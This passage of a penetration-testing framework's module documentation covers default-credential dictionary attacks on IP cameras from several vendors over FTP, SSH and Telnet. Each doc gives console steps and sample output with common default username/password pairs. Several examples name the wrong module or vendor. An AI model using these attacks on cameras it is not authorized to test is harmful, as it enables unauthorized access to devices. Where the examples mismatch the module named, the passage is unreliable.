## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/basler/ftp_default_creds
rsf (Basler Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Basler Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/basler/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Basler Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/basler/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Basler Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/basler/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/brickcom/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Brickcom Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ftp_default_creds
rsf (Brickcom Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/brickcom/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Brickcom Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/ssh_default_creds
rsf (Brickcom Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/brickcom/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Brickcom Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/brickcom/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/brickcom/telnet_default_creds
rsf (Brickcom Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Brickcom Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/canon/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Canon Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ftp_default_creds
rsf (Canon Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/canon/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Canon Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/ssh_default_creds
rsf (Canon Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/canon/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Canon Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/canon/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/canon/telnet_default_creds
rsf (Canon Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Canon Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/cisco/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ftp_default_creds
rsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/cisco/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ssh_default_creds
rsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/cisco/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Cisco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/telnet_default_creds
rsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/dlink/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ftp_default_creds
rsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/dlink/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ssh_default_creds
rsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/dlink/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against D-Link Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/geovision/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against GeoVision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ftp_default_creds
rsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/geovision/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against GeoVision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ssh_default_creds
rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/geovision/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against GeoVision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/telnet_default_creds
rsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/grandstream/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Grandstream Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ftp_default_creds
rsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/grandstream/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Grandstream Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ssh_default_creds
rsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/grandstream/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Grandstream Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/telnet_default_creds
rsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/hikvision/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Hikvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ftp_default_creds
rsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/hikvision/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Hikvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ssh_default_creds
rsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
================================================
FILE: docs/modules/creds/cameras/hikvision/telnet_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Hikvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/telnet_default_creds
rsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
================================================
FILE: docs/modules/creds/cameras/honeywell/ftp_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Honeywell Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ftp_default_creds
rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
================================================
FILE: docs/modules/creds/cameras/honeywell/ssh_default_creds.md
================================================
## Description
Module performs dictionary attack with default credentials against Honeywell Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ssh_default_creds
rsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
